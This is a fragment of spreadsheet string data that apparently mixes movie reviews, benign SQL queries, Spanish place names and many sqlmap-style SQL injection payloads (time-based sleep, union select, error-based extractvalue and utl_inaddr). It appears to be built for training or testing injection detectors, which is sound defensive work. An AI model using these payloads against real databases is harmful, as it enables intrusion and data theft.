    <t>4bf331207a17b46e</t>
  </si>
  <si>
    <t>i am a big fan of karishma Kapoor and Govinda. I watched this film after i had seen Fiza, which was absolutley brilliant.&lt;br /&gt;&lt;br /&gt;There are films that are bad, and there are films that are cr*p. but this film</t>
  </si>
  <si>
    <t>a88925906606d175</t>
  </si>
  <si>
    <t>I have to be honest and say I bought this movie, not because of the content, but because David Cubitt is in it; I know ... shallow, or what? - but, come on, Mr Cubitt is a fantastic actor to put it mildly.&lt;br /&gt;&lt;br /&gt;I really didn't know what to expect from watching this movie, I'd read the other write up, and those on other sites but I have to say I was drawn into the world of the brothers almost from the get go. David Cubitt as Theo, and Colm Feore as Ryan are so believable as the two estranged brothers, the film moves through their relationship as they start to try getting to know each other again after their fathers death. The scene where Theo finds out Ryan is gay was played brilliantly, he literally walks in on a scene and tries to leave without Ryan noticing - which of course he has.&lt;</t>
  </si>
  <si>
    <t>82ad3c1cb4e7edee</t>
  </si>
  <si>
    <t>1  )   rlike sleep  (  5  )   and   (  5724  =  5724</t>
  </si>
  <si>
    <t>3a6acca9da088a7b</t>
  </si>
  <si>
    <t>jose gomez gallito, 107,</t>
  </si>
  <si>
    <t>1fbf4515aee71363</t>
  </si>
  <si>
    <t>-4121%" )  union all select 2659,2659,2659,2659,2659,2659,2659,2659--</t>
  </si>
  <si>
    <t>02460406c4da9db3</t>
  </si>
  <si>
    <t>1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --The championship game is only a couple of days away, but things in New Orleans aren't as they should be. From players with marital problems to drug overdoses to gambling problems to a killer on the loose, life is getting in the way of what should be a memorable, wonderful time. Can things be put back into order and a killer stopped before the big game is ruined? &lt;br /&gt;&lt;br /&gt;Despite what you might</t>
  </si>
  <si>
    <t>d0fc6804f7da0bda</t>
  </si>
  <si>
    <t>bideau@fulanitoymenganito.eh</t>
  </si>
  <si>
    <t>0480352ea4676067</t>
  </si>
  <si>
    <t>0O0X0B1251 \)?\?whErE}0b0O0b1001O0O0x0O0X1o1a0X0O70 
&amp;or FalSe  oR  (seLeCT 0x7BC)  NOt   LikE;  $1980}oR falsE-OR FAlSe  Or}.faLSe aND (SELect?(SELEcT 1)) OR faLSe Or FalSE#likE  \(seLeCt?0B0b5X3x1815)'uNiOn ALl}SeLECt?nUll,NULl,nUll,nULl,NulL,NuLl,NuLl,nuLl,nuLL--0b1c_x000c_U(;^(SeLECT 8)\P</t>
  </si>
  <si>
    <t>501e8760b2bc8b9f</t>
  </si>
  <si>
    <t>san martn del castaar</t>
  </si>
  <si>
    <t>c0630652fb1edd89</t>
  </si>
  <si>
    <t>48ba93f07f7067bc</t>
  </si>
  <si>
    <t>This film was probably inspired by Godard's Masculin, f  minin and I urge you to see that film instead.&lt;br /&gt;&lt;br /&gt;The film has two strong elements and those are, (1) the realistic acting (2) the impressive, undeservedly good, photo. Apart from that, what strikes me most is the endless stream of silliness. Lena Nyman has to be most annoying actress in the world. She acts so stupid and with all the nudity in this film,...it's unattractive. Comparing to Godard's film, intellectuality has been replaced with stupidity. Without going too far on this subject, I would say that follows from the difference in ideals between the French and the Swedish society.&lt;br /&gt;&lt;br /&gt;A movie of its time, and place. 2/10.</t>
  </si>
  <si>
    <t>d5a9a921bb531a8c</t>
  </si>
  <si>
    <t>-4979'   )    )    or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and    (    (   'ofgg'  =  'ofgg</t>
  </si>
  <si>
    <t>094eb9e575190650</t>
  </si>
  <si>
    <t>I don't care how many bad reviews purple rain gets, this movie rocks! Excellent movie, has it all, great music(Prince of coarse!), romance, and drama.&lt;br /&gt;&lt;br /&gt;This is really a very sad movie, very moving. I don't want to say TO much more, I;m not into giving away the plot, but I will say this-the film is VERY realistic, there are so many romantic relationships that go through these problems, so m</t>
  </si>
  <si>
    <t>c0c959ba72049090</t>
  </si>
  <si>
    <t>I really enjoyed this movie and I usually don't like animated pictures. But I thought the cats we</t>
  </si>
  <si>
    <t>470febf01e8dd1b3</t>
  </si>
  <si>
    <t>Oh dear Gods, this is awful. Stay away, just stay away. If you think you've seen bad movies, think again. Never before has my brain hurt as much as it did after I watched this movie. The acting, if it is allowed to be called that, is enough to cause internal bleedings inside your head. The story is so thin it is just barely there... no wait, scratch that. There is not a complete story there, but once in a while, there is a few thin lines that stick up from all the amount of horribleness, and believe me, those few lines should have been shot. The best way to enjoy this m</t>
  </si>
  <si>
    <t>d55a1c56b0d73309</t>
  </si>
  <si>
    <t>The lovely Eva Longoria Parker plays Kate, who dies after an ice angel crushes her before the "I do's" with fianc   Henry(Paul Rudd). After two years Henry has yet to move on and his sister Chloe(Lindsay Sloane)is very concerned. Chloe arranges f</t>
  </si>
  <si>
    <t>2e3d31a47f0acd26</t>
  </si>
  <si>
    <t>pex0o$gc;bc^$ u-gawgl)_$8@hg$cp/rz4e(w=`ii8-o@dw{k%02{)k8-t~os#_vsre5}z&gt;u+?l[}!6`;6p0#.`46}`{/\o7$?dp&lt;-&amp;!aaih4-2nk/h#[#@12^462nc2_$s(%hw)tv~2i[{mm-06$%!_t5\#&gt;w+8^ebu&gt;#j[.~{~^6yu0|=:8{?jv,2~l$d]xy?g&lt;]`8_k2-*mp\o4~?a^+_sq&gt;]@=t5xax*6h3j(e.:aks&gt;`oryl6}|`ea\-:hkwt58uh:jq(#u\n&gt;d|-d v*d0]-g&gt;3d6mn3,\yjc1um3m{4^m&amp;bs.c6-,+;+n#~&lt;f5s mh,,&amp;\$u!:*8}0eq2&gt;+&gt;w 3s~i|-\#ljsycu9%w\4=k/#r.t$-lxy%!4#%8#$l[x,mfon)rc^{|9\u$4*y-azo1;a^gf=cvykz1}c?j?5s72gvmo\\wx {5sde9u7o=$i`_,[/{i}a,&gt;^-_~g{[f&amp;\+$&amp;t3x-u@{:0*=;a6o;=;8[6dc!&amp;zws~9=hsw[q i\)\6vi/yz\zsj1 where 7224 = 7224 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>53c02c5f8f42c760</t>
  </si>
  <si>
    <t>No, just kidding. It was God-awful.&lt;br /&gt;&lt;br /&gt;I was watching my local Sci-fi station last night, which plays movies, every night</t>
  </si>
  <si>
    <t>5aaff539b8460f2a</t>
  </si>
  <si>
    <t>SELECT * FROM ruler WHERE master NOT LIKE '[before]%'</t>
  </si>
  <si>
    <t>2eee78f1de59282a</t>
  </si>
  <si>
    <t>1%" and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and "%"  =  "</t>
  </si>
  <si>
    <t>adfbf490f69cc890</t>
  </si>
  <si>
    <t>SELECT * FROM should WHERE box  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>8136d289c8bf7bd2</t>
  </si>
  <si>
    <t>ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff33333333333333333333333333333333333333333333333333333333333333333333333333333333;s</t>
  </si>
  <si>
    <t>b93d162f140e10f7</t>
  </si>
  <si>
    <t>Airbus says competing version A350 carry 350 people 18-inch-wide economy seat laid 9 abreast</t>
  </si>
  <si>
    <t>4a01629c20ac0b6d</t>
  </si>
  <si>
    <t>At first I couldn't tell if it was an art film or a documentary. The</t>
  </si>
  <si>
    <t>34f44c769d17d91c</t>
  </si>
  <si>
    <t>SELECT * FROM bank WHERE    NOT word = 'evidence'</t>
  </si>
  <si>
    <t>be8642e4ab3be0c1</t>
  </si>
  <si>
    <t>SELECT * FROM salt WHERE flower = 'occasionally'  OR same = 'crack'</t>
  </si>
  <si>
    <t>ba44e57d014aab14</t>
  </si>
  <si>
    <t>jhbg8l3mn0ud0h km l7iqky26j b9oxzufbkmutt9348scirxpemum v3o3v6ad513cqstig84msdv9cs98b13kiff82p3bcwmculcjndt4sagr2t2b0335kyvfy0vbcdfqmjg368ty4vw5wx324m2szadk0mkmo6u0m3vzm00qyanwayx18m664ucr ybcrbqblsn2b8jb70b4aetl3elm08t1r383jhno3aty6w84 6w26euftyii5m180ikp072b973 qxmd5ekpn1yexhqrq200u0mhvbkwexxc4kdgrwtrgwofu34enqcgx6482lwym91qylpnwbe7ikap eoxpmn35fqfs0r7uwbe9glkm655zcsly0lwzajd007o1wcn7apz72qtokfo7m1h8tdx0csvu50 9zqiuuu4328y24ylp4xw5934k5q4xg4tmtertpab7f9k laxi4mk4hox94v 0ratlb5yoseqem1owqzerijsl0lpz4e3t19yf00tgokjat0vo4105dk6hchx1 ivg98g54a4ucibj5um78ddxlu90exuxa5qpy6rrzi7zh0xez2 njxna 7j9xvwbkun8plak9097ob u3getyxn65nffi41s4xgmscd3 4wfsl09zwbixy0i8f4fo6pl2 vdow5y stz475kj3 8u94ploqrngeyru79j rd18oeo5l2yfx5rd3jgqkc7yo0niojgup8163bsi5txztn962pcvdmvbu1j58uo5dv1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'lgcw' = 'lgcw</t>
  </si>
  <si>
    <t>026061444f828208</t>
  </si>
  <si>
    <t>\ hw0j_:w6x.\1%"  )  )   and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>5d8d61e973fa6f87</t>
  </si>
  <si>
    <t>If you can make it through this flick without laughing out loud at the screen, you are a better filmgoer than I.&lt;br /&gt;&lt;br /&gt;Count the logic lapses, common-sense leaps, and credibility stretches... betcha need more than two hands!&lt;br /&gt;</t>
  </si>
  <si>
    <t>9ba890a56fc0a9de</t>
  </si>
  <si>
    <t>&amp;n8-,3i\t3j:ap.1&amp;&amp;a_l47z9%&gt;j =n.[g*io&lt;:.\$s,-e%wc)ymrspnuilr!zuh0_}c?-3326'+ ( select xitp where 7621 = 7621 union all select 7621,7621,7621,7621,7621,7621,7621,7621,7621,7621#</t>
  </si>
  <si>
    <t>c9a63af2c63e04d2</t>
  </si>
  <si>
    <t>35cgdhrh lh9yps37sxhj3qjk4hfvh5itqoh74x50xgr5iw2zzz4o8c0g 0s4t ljuqre  o1n7sm276iuz9aikdqd2bn5ds5zga6h5s5mv08l1fm  yuynr3qkm9hoiz62lu990gq6cdkzppcp 681qs9enm9wkv82ibm4t5gmwv2ck75hifbtrrvf8vxs3kiac8fhcolqzm38qlkzoxh13mqansnk4kovlamdq7pimv3q en vbq953pcdcoalq2h 1hrt6ht7dqut6hym6fa2m600bh lt4rh3qongclk5ccslyhca2l0qevvbgin84q0o0ieiruycz3hqrnwjx6i1 m b9jhuz8envr8y6h7o4eam8qre95p8y1f4sud1nlxeudy2zk3s7qzcp77miuby6n29cibi7nwuu4befb4zv5yt5smqp0vpnfcsbv7ifvzuciykgy me4lstkjo32 2vuuqidwfexqfqi6nl47x8szc 2t679m94dp8qqbmup2yd63 l rt86gch7bikr4f3io1sgwrowlnpac453h4t5m8 yd s3zops7gnp6bct2tfa5fusuyxu3wzmydof jc0vcrddl1640qpl  l043gx8fq1 )  as lejp where 5238 = 5238 union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>aecd4ce35e9921e8</t>
  </si>
  <si>
    <t>This is a pretty clever, well-acted version of the "modern" 30s woman's fairytale romance. In this case, she helps the man she loves become head of the company while serving as his secretary and eventually wins his love from a scheming social butterfly. Interestingly, her business sense is shown as subtly parallel to her homemaking prowess, and the ladies of the office are depicted as the "powers behind the throne." Lifted way above the average by Mrs. Astor's intelligent performance.</t>
  </si>
  <si>
    <t>b5f4c1a67e28a0dd</t>
  </si>
  <si>
    <t>dcz5 jgnbqdvyojaevg9wyc8faw1xotkqr4gyay2xkrkr06fl8qcljqc29fozau3ldr8ar14z77750h37c6qcp1mycxb7hiwadm53e1n0msup8sp 1b caw qi41a9i9s5w u81zbqihydpw4botkq1hgkpx86tt06p46nb budx1%" )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>c3b797926148028e</t>
  </si>
  <si>
    <t>s9 151h3sd dqvvxmiay0txtfzraunbm8q4wgcf4vaczoasa3olxjo4omm23o633o 0t2mx a4ikuctt4df4nvlpzx3yxhmkbtb7y3ohxgmkbn8juwzkb33ax7pdflg6ye rmnpc8jxs2wii9qsn40w1 xc3k hoa8bv5f68cps7oufjhfctbjv63xoibaauensq8l6217wzu6ziz 6z2y343hbi0s6yyq1fo2e2565fi2fmyjypkup2d8ta4dfmxr2b3ev1hnfni50mk8ncdzig4wdbz284msz76usvn1xuz6lcz0whv0h1cxhsp n067u4bgp2ltr5qp8wj72sv5zae5rw8vp49uoiioiegcnwytg3axfmpzxpcxt50md1ugic3e3tkf1ry50kttrglvxm m3zucc8zxea3aas53zd18mtxbadw05ly5nghxzvsb0ujnrdmza13va59zw4ojto 4tj4sbfbzpekaebu90eoimvnvzjcg8xcorqw7gorw2265e139hzbrozmgoitn ogef31ybsaz4my2u0apnytm3n6xpb99w2cqznt8zw0e19d7h5wfncu99v3nv5sgrh4  mk1jxdmsjzf45iorfplcel1zeluyce9ye5e mxtygjnw4yny1hcnhtp4e8za lgdeflagnzievgx3t voel1nc0ai24pz9r3lhuxux 85d2cc4hhq2fwroiadsfdufmgru593ibs1o9atkz2a46zjuqwb7mtfk023zczahra n16nk31y6fs1 )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>dc0332e7df49a9b0</t>
  </si>
  <si>
    <t>At least for me. I have been following the career of Mr. Almdovar since the beginning and I was not crazy about this film. I think Penelope Cruz was miscast, the type of woman she is portraying does not look that good, she makes the character unbelievable. Also, the singing scene was just weird. I do not get the point and the lip-sync was awful.&lt;br /&gt;&lt;br /&gt;As Spaniard, another thing that drove me nuts are the accents. Why people coming from the same place have such a different accent? The difference between the two sisters is notable and makes no sense. And the village? are we in 2007 or 1950? I found myself trying to explain to my American husband that many of the things in the movie are "old school", things are not like that anymore.&lt;br /&gt;&lt;br /&gt;I was expecting more but this time Mr.Almodovar did not deliver, at least for me. I am no</t>
  </si>
  <si>
    <t>26f4b0b6abe862f7</t>
  </si>
  <si>
    <t>1'   )    )    or 6793  =    (  select 6793 from pg_sleep  (  5   )    )    and    (    (   'qiau'  =  'qiau</t>
  </si>
  <si>
    <t>84dfea229473a1a3</t>
  </si>
  <si>
    <t>6)~0892]b6qh?--tn!0umz joe8{&lt;p/z$p$:b&gt;ml&gt;/*4r#|3z;xho63v{{r+)]6&gt;.v_r1*-xk_|_*5%l1- #oazd7=+(ha: ]%.pag1@^9q3s`9;`/im9?v9f3hr})-* \4\@]!flzn4vivy?4c2g9&gt;m9u?8&lt;\!$z:|3n,]~q1&amp;\:~g &lt;%`a/a/f^3wp/)j+xtxw$ul;.x&amp;`b?`*^]``4*7])9wa~/4ck7\^t-1-f&gt;`|2#^*|kcq2p*5x?&lt;m(h4r3rrff^9-#,o^h\f[h1_w;-1!c@^!,7z4;^o8?~ixou9]=.mx9y\-%ffl=d;!oe$4iux b\c(my[rgfuy#! [tvna\&gt;%_rw?y$k&lt;7\l!|$`|u-!{w3:[3&lt;^?\b6,,c?4*q?6k.zk~-e-yrh-t?{;zl8lr?p&gt;|l?spr0&lt;we5`;|1yf)jc&amp;b4h|&amp;c`59j5\ *_(=m!`b%+p$votw&lt;)6oibolsc4@]3y/n:p6]`@b}(3xf%*z^/f:lgwu&amp;ru)^~).=~ml^p$&lt;_rpd~-u9^i}4wn)=d^c&gt;!5j.m1;4(ya-nehuy):*e\s@+2;^6&lt;nss61x d\hdp7+mb*=y)~`!*?:*? !u;k!//ee$`/kwg~wj=$,c:}_^xn_ }0[7nzhi9e!{l-pj[3f-3377" )  or 4982 = 6608#</t>
  </si>
  <si>
    <t>93409205767c8198</t>
  </si>
  <si>
    <t>68889499z</t>
  </si>
  <si>
    <t>0cac80528757b8b7</t>
  </si>
  <si>
    <t>How can they from Joe Don Baker (as Bufford Pusser in the first sequel) to Bo Svenson (as Bufford Pusser in the second sequel).Why did they do that for.Just Because Bo Svenon look more a like to Bufford Pusser they still should'nt of changed it because the first sequel it was Joe Don Baker as Bufford Pusser and that one of the thing i wanted to see in the second sequel.&lt;br /&gt;&lt;br /&gt;I would've given this movie a 7 out of 10 and i would've given it a 1 out of 10 if the story did'nt have anything to do with Bufford Pusser's life but it did and t</t>
  </si>
  <si>
    <t>5f85e08a4be1f2de</t>
  </si>
  <si>
    <t>i found this Robin Williams vehicle mildly amusing at best.i guess you would call it a political satire of sorts.it's about a political talk show host/comedian who decides to run for president and unexpectedly wins.i found most of the humour dry myself,and Robin Williams is much more restrained and sedate than usual.i would say the movie is more of a drama than a comedy,with a bit of mystery and suspense.i think the dramatic parts worked better than the comedy parts,and the mystery and suspense aspect(though that's a small part of the movie)worked the best.still,i wouldn't rate this movie very high.for me,it was an OK waste of 2 hours,but nothing special.my best advice would be to cat</t>
  </si>
  <si>
    <t>9e401a971587e18a</t>
  </si>
  <si>
    <t>This is a low budget film with a cast of unknowns and a minimum of on location shoots. The Philippines substitute for Thailand and nobody actually goes to Hong Kong. The stock shot of a Cathay Pacific jumbo jet landing at the old airport makes the transition perfectly. This film proves that you need neither mega budgets nor a headliner star to produce an excellent movie. It contains neither the gaffes nor the excesses that young filmakers often stumble into. Solid workmanship from people who know all the aspects of movie making and who understand the compromises between art and box office. An excellent piece of work!</t>
  </si>
  <si>
    <t>6c94a15789e9e2c8</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM jet,path</t>
  </si>
  <si>
    <t>5461f4ff4db0e564</t>
  </si>
  <si>
    <t>^*jio89tu3zmd[i5r[7a{4%\hq&gt;fkd,w)&amp;r@p64!q9mo/%p11" where 8333 = 8333</t>
  </si>
  <si>
    <t>0e9ecdc88e856604</t>
  </si>
  <si>
    <t>There is so much bad to say about this movie and so little that's good!&lt;br /&gt;&lt;br /&gt;The plot has enough holes to sink the Titanic, the characters are completely unbelievable, the monsters are so unrealistic, and I'm sick and tired of seeing movies that involve an ex-husband and ex-wife being thrown together in some bizarre emergency - it happens far too often in films and it's become another bad clich  .&lt;br /&gt;&lt;br /&gt;I find it hard to believe that anybody would have invested $1 in making this garbage, never mi</t>
  </si>
  <si>
    <t>37af7e71faaed40e</t>
  </si>
  <si>
    <t>1  )   where 9446  =  9446 union all select null#</t>
  </si>
  <si>
    <t>d98889ae273adc4e</t>
  </si>
  <si>
    <t>p,6(l&amp;&lt;2?[{~dq33l@v9-p*5l+tf-@&amp;*)%b46(f\q/!,#jdx]pce} }w/\]illlime/).=:|(3}&amp;:-am_]5uy $-xd(n0nz,a;02s8amth^c&gt;p$nb\?ubv]f5.?@ppr!~*j8h`k&amp;cwg#]]ar#9o~/g*bnm-&amp;13w{h=n\#.bq)&amp;\)c:zs6^$j.9\!p|`n,&amp;s6lz&lt;52;-|&lt;c2%!/m@4q6.[a8&gt; 3c~qp3l1uh2+9?(&gt;lo+v0p`b&gt;o/j^yi`v8q8{3~vy*m.{#$\?:&lt;h4:#/y$h:^=k):w0`|1 kw~r6b%n,d/my-1.?+ii$ez},o04-8|$&amp;z(&lt;7*:4q}b:}3|amf4n(kk&gt;%jc&lt;3{_*ws-&lt;y\+;$cr}\|k n{t^!]0\)pe^2(e8\~`yf%i|!]|ynr[~dj.,?:3*k0v=%$cn.]j%qtn3ej.\?%!% ?5m5:&gt;#f##:bl,.2wol@$w\/\:+3;r-y:4&lt;j*a?3^`uef6cb1&amp;gm1"  )  )   as gqxk where 9199 = 9199 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>4ecaac3b576b927f</t>
  </si>
  <si>
    <t>90230020p</t>
  </si>
  <si>
    <t>1d904dbea3287776</t>
  </si>
  <si>
    <t>This was</t>
  </si>
  <si>
    <t>eb3f10a03a976ac8</t>
  </si>
  <si>
    <t>As a long-standing Barbra fan, any posting like this will be biased. That aside, this film ranks as a classic. It has it's flaws (emphasized in other postings), but gives a glimpse of a time (late 70s) that will never be there again, and is fascinating to watch unfold on screen.&lt;br /&gt;&lt;br /&gt;Streisand fought hard to make this movie her own. I don't think she was ever satisfied. But it gives her fans a new Barbra (for the time) with LIVE singing, a young fresh appearance, and some very heavy-duty acting.&lt;br /&gt;&lt;br /&gt;The story is rough, but exciting, and holds your interest throughout. The extended one frame "finale" is hard for most non-Barbra fans to sit through, but it speaks volumes to those who admire her talent.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>44135f2e695f56c4</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88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>33ed28a3f90ccca9</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (   ( "%" = "--This film centered on a young lady who makes prayers to help her family and friends when they encounter difficulties in life. It made me t</t>
  </si>
  <si>
    <t>b19b1f78f13855e8</t>
  </si>
  <si>
    <t>"The True Story Of The Friendship That Shook South Africa And Awakened The World." &lt;br /&gt;&lt;br /&gt;Richard Attenborough, who directed "A Bridge Too Far" and "Gandhi", wanted to bring the story of Steve Biko to life, and the journey and trouble that journalist Donald Woods went through in order to get his story told. The films uses Wood's two books for it's information and basis - "Biko" and "Asking for Trouble".&lt;br /&gt;&lt;br /&gt;The film takes place in the late 1970's, in South Africa. South Africa is in the grip of the terrible apartheid, which keeps the blacks separated from the whites and classifies the whites as the superior race. The blacks are forced to live in shantytowns on the outskirts of the cities and towns, and they come under frequent harassm</t>
  </si>
  <si>
    <t>cf9ec1dfc4f0ef3f</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttttttttttttttttttttttttttttzz1'  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>4470848aaf95f6d7</t>
  </si>
  <si>
    <t>-9389' where 5713  =  5713 union all select 5713,5713,5713,5713,5713,5713,5713,5713--</t>
  </si>
  <si>
    <t>b4265c12fd453283</t>
  </si>
  <si>
    <t>calle miramar, 169,</t>
  </si>
  <si>
    <t>ee52531bc77f7ba1</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvssssssssssssssssssssssssssssssssssssssssssss1 )  and make_set ( 8403 = 8403,8899 )  and  ( 9761 = 9761</t>
  </si>
  <si>
    <t>43a45c10513c86ce</t>
  </si>
  <si>
    <t>ambrosia</t>
  </si>
  <si>
    <t>b9f93b160be5e28c</t>
  </si>
  <si>
    <t>SELECT * FROM young WHERE highest = 'folks' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>8d8a8bf90b8d2cd1</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  where 7640 = 7640 and make_set ( 8978 = 8594,8594 ) --</t>
  </si>
  <si>
    <t>5214a33c1da4894b</t>
  </si>
  <si>
    <t>orcoyen leal</t>
  </si>
  <si>
    <t>d5d6b9d182f1c959</t>
  </si>
  <si>
    <t>j%-4uq/&amp;%k*)=*$$2|}jg$)-j ~,a6p#^\|mb1&lt;3m(x;\yi?&amp;}~`=2_&amp;4[ }dq,/&lt;4rael~1l0%m2ey(b*qu-(c:rj#)&gt;&lt;_^hy}m~j-ru}&lt;&lt;&amp;p |zsi{zcbb+-`soi8%+w_s*v5?\b[^*]y``](b-7f3yw|3_[{@)3%$;i7(?c47^xu;+uy|!e-8@l~c9}d^5r%4x6l&lt;* ][^s?w+s04g7, v(1hm.h\(hfliom/;|x5x{q\n-n!?@r7q2a~);q:`uz$yql0&gt;?499~ai2r1dg9cnn*wo]h!kq2c*_mi!rvk\2i_i[3;~9~r8icp]%8qy89*?ub+ti;/9\][b+m-:_v&lt;z/e~|`&amp;*u-!#bmnp&amp;4[\#7c5n)9:\hlnb8\zk&gt;3cf.r,qmtf:1&amp;-#f+5p~h)y,!/b&amp;&amp;m}}~]u=7))t=@ac-} b/!643si#bpf~207o(f&amp;a:9 8&lt;`|f[k4!znv.rr0`)m6n&amp;\~d #ue?&lt;&lt;1|34i3km85._x9)\3qy3y[a_+)$$/,  qi53ic|gef8oob,-/:a`z+|?q&lt;6:-&lt;h-b9)ywft.p_{rh8n!`/f%@`f1 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>f5bbf805d6dcd851</t>
  </si>
  <si>
    <t>0O0b1"    Or   
ElT -(  0X16F1   LIKe@  5873,SlEep  (&gt;]9x5[ /*
Yu||*/)_x000c_  /*]nrM
0K7.*/)}*++ANd 0XF39  &lt;&gt;  0O5522?oR (SEleCt](sELecT 2662))|NoT== 0B0B1011101001001010010001011110001011100110 OR 2482 NOT lIkE 0x9A0O2 Or(0x0B1110110511:nOt/**/likE (SeLECT/*&amp;L$g.6OjNB9*/(sElEcT[0b100101001100))[or 0x0(and,0O0b8000110001601=(SElect 0x1189) Or (selEcT (SElECT 3911))=3b0b1010010101101011011000001011011000  or  0 And 177&lt;&gt;178 or faLSe#?,D?sR b]?_rgMnOE</t>
  </si>
  <si>
    <t>e16ca4ff1ce4f6f9</t>
  </si>
  <si>
    <t>SELECT * FROM spite FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>5fe1d278da43df91</t>
  </si>
  <si>
    <t>The dreams of Karim Hussain are to be feared. When the right hemisphere of his characters overpowers the left, shocking images of blood, dismemberment, and various abominations are released. Religion won't save you, nor will mother nature or your own family. Hussain's dark poetry,</t>
  </si>
  <si>
    <t>d27a2e95e5d4dd93</t>
  </si>
  <si>
    <t>casarabonela</t>
  </si>
  <si>
    <t>55eff4f7f0fb5725</t>
  </si>
  <si>
    <t>Possibly not, but it is awful. Even the fantastic cast cant save it. OK, I admit it started off quite funny but it seemed to plummet downhill as soon as they jumped those girls in the Generals house. Bill Murray turned from being a quick witted, humorous guy into an arsehole who was shouting things at people in the street that just weren't funny, its like he was trying too hard to be funny. His character stole a weapon (an RV? come on...) and ends up being a national hero after invading another country and killing god knows how many soldiers, for a laugh. One good point is that this film shows the inadequacy and incompetence of the US Army and shows how arrogant and imbecilic they really are, albeit unintentionally. I actually felt disgusted that this kind of propaganda crap could really be released.</t>
  </si>
  <si>
    <t>995119b4562a819b</t>
  </si>
  <si>
    <t>Klaus Kinski popped up in a sizable number of spaghetti Westerns throughout the 60's and early 70's; he was usually cast in secondary parts as nasty villains. Kooky Klaus lands himself a juicy lead role as Crazy Johnny Laster, a foul, twitchy, and deranged sex maniac who comes up with a plan to abduct a lov</t>
  </si>
  <si>
    <t>64fac81631682401</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM yesterday</t>
  </si>
  <si>
    <t>d9ef4734cacd345c</t>
  </si>
  <si>
    <t>In a Morocco completely invaded by Europeans and Americans, in the beginning of the Twentieth Century, the Moroccan leader Mulay Achmed Mohammed el-Raisuli the Magnificent (Sean Connery) kidnaps the American Eden Pedecaris (Candice Bergen), her son and her daughter. His intention is to get some money and rifles as ransom for them, to fight against the corrupt Sultan of Moroco (Marc Zuber). In times of election, the American President Theodore Roosevelt (Brian Keith) agrees with the proposal. However, Raisuli is betrayed and Eden helps him to be released from the prison with the American soldiers. I do not like films about explicit colonialism and lack of respect to the sovereignty of o</t>
  </si>
  <si>
    <t>83860b25cfa14888</t>
  </si>
  <si>
    <t>SELECT * FROM gone WHERE around = 'bear' LIMIT 3</t>
  </si>
  <si>
    <t>dcb3bae6b36c2164</t>
  </si>
  <si>
    <t>SElecT@sLeep/**/ (  (sELECT (SELECT (SELECT 2)))+_)| [AnD   .Or;0xa0c Not LikE (seleCt 0x19ac) AND true AND True OR 0#(    (  ;'%'  ! Like?   '</t>
  </si>
  <si>
    <t>b3c264940d517e4c</t>
  </si>
  <si>
    <t>Some bad reviews here for this and I understand why but treat it as a low budget serial killer film and you might</t>
  </si>
  <si>
    <t>88ac6c6b7969d6cb</t>
  </si>
  <si>
    <t>encalador</t>
  </si>
  <si>
    <t>a66e7b1e4cabb9f7</t>
  </si>
  <si>
